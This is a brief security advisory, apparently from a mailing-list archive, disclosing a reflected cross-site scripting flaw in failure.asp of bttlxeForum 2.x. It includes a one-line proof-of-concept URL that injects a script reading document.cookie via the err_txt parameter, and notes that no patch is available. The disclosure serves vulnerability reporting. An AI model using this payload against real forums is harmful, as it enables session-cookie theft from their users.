bttlxeForum 2.* XSS Vulnerability

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



--------------------Summary----------------
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus 
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.cookie);</script>
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)


[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux